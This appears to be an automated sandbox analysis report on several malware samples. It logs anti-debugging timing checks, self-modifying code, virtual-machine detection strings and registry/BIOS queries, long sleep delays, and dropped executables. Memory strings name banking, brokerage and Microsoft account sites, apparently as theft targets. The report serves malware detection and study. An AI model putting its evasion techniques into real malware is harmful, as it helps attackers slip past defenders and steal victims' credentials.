Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 112697C second address: 1126997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1127E72 second address: 1127E79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 1129A46 second address: 1129A94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A44h 0x00000007 push edx 0x00000008 jmp 00007F2468CF6A3Bh 0x0000000d je 00007F2468CF6A36h 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F2468CF6A49h 0x0000001e jnc 00007F2468CF6A38h 0x00000024 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Special instruction interceptor: First address: 115E7B7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Special instruction interceptor: First address: 115CE65 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Special instruction interceptor: First address: F6F791 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Special instruction interceptor: First address: F6F835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Special instruction interceptor: First address: 1117D0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Special instruction interceptor: First address: F6D32A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Special instruction interceptor: First address: 112CBC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Special instruction interceptor: First address: 11A5822 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Special instruction interceptor: First address: 18EFC3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Special instruction interceptor: First address: 3323C3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Special instruction interceptor: First address: 359CF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Special instruction interceptor: First address: 18EF20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Special instruction interceptor: First address: 33A92D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Special instruction interceptor: First address: 3BCEA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 101EFC3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11C23C3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11E9CF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 101EF20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11CA92D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 124CEA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Special instruction interceptor: First address: 1498DE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Special instruction interceptor: First address: 1499BC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Special instruction interceptor: First address: 2F8BD9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Special instruction interceptor: First address: 309652 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Special instruction interceptor: First address: 38273A instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Memory allocated: 3170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Memory allocated: 3070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 950000 memory reserve \| memory write watch
Source: C:\Windows\System32\regsvr32.exe	Memory allocated: 1A570000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory allocated: 33D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory allocated: 34E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Memory allocated: 33D0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe

Code function: 4_2_050B0558 rdtsc

4_2_050B0558

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Thread delayed: delay time: 599844
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1069	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1071	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1098	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1102	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Window / User API: threadDelayed 9427
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 647

Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9LOBR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-S1J4E.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062147001\db8c172567.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-1MO68.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-TG5QS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-S1J4E.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9LOBR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-S1J4E.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9LOBR.tmp\_isetup\_isdecmp.dll	Jump to dropped file

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe TID: 1252	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3396	Thread sleep count: 1069 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3396	Thread sleep time: -2139069s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2260	Thread sleep count: 1109 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2260	Thread sleep time: -2219109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5136	Thread sleep count: 241 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5136	Thread sleep time: -7230000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1812	Thread sleep count: 1071 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1812	Thread sleep time: -2143071s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3836	Thread sleep count: 1098 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3836	Thread sleep time: -2197098s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2000	Thread sleep count: 1102 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2000	Thread sleep time: -2205102s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6120	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe TID: 6648	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe TID: 4952	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 7676	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228	Thread sleep count: 5754 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692	Thread sleep count: 647 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5168	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4288	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe TID: 2364	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe TID: 2364	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe TID: 2364	Thread sleep time: -599844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe TID: 2364	Thread sleep time: -599563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe TID: 4996	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe TID: 4524	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Thread delayed: delay time: 599844
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\36469\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\36469

Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: DbCMTMgeJo.exe, 00000000.00000003.2089807661.0000000005DEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: DbCMTMgeJo.exe, 00000000.00000003.2134855142.0000000001705000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2122359158.0000000001705000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2068060322.0000000001705000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2146513792.0000000001705000.00000004.00000020.00020000.00000000.sdmp, UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001517000.00000004.00000020.00020000.00000000.sdmp, UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001502000.00000004.00000020.00020000.00000000.sdmp, UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.0000000001538000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.0000000000859000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.000000000082B000.00000004.00000020.00020000.00000000.sdmp, c153ad0ce0.exe, 00000009.00000002.2897884822.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: powershell.exe, 00000023.00000002.3067255526.0000023280228000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: regsvr32.exe, 00000022.00000002.4521061526.0000000002310000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: vmware
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: DbCMTMgeJo.exe, 00000000.00000003.2089807661.0000000005DEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.00000000014BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: regsvr32.exe, 00000022.00000002.4530443154.000000001ACB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Avoiding.com, 0000001A.00000002.4524811305.0000000004540000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\\\Windows\WinSxS\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.19041.1_none_93cc37f483916b61\.
Source: 21aaa725bd.tmp, 0000001E.00000002.2946327465.0000000000807000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}v
Source: c153ad0ce0.exe, 00000009.00000002.2897884822.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx}
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: skotes.exe, skotes.exe, 00000007.00000002.4521279718.00000000011A2000.00000040.00000001.01000000.0000000B.sdmp, 1639401074.exe, 0000001C.00000002.2920443910.00000000002D7000.00000040.00000001.01000000.00000013.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: DbCMTMgeJo.exe, 00000000.00000003.2134855142.0000000001705000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2122359158.0000000001705000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2068060322.0000000001705000.00000004.00000020.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2146513792.0000000001705000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWiQu
Source: powershell.exe, 00000023.00000002.3067255526.0000023280228000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe, 00000004.00000003.2276690934.00000000011B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Avoiding.com, 0000001A.00000002.4524811305.0000000004540000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\\\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\.
Source: Avoiding.com, 0000001A.00000002.4523822191.0000000004440000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\\\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\.
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe, 00000003.00000002.2287809915.00000000014BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware))
Source: skotes.exe, 00000007.00000002.4516129334.0000000000859000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4"
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 21aaa725bd.tmp, 0000001E.00000002.2946327465.0000000000807000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe, 00000004.00000003.2286648035.000000000119E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
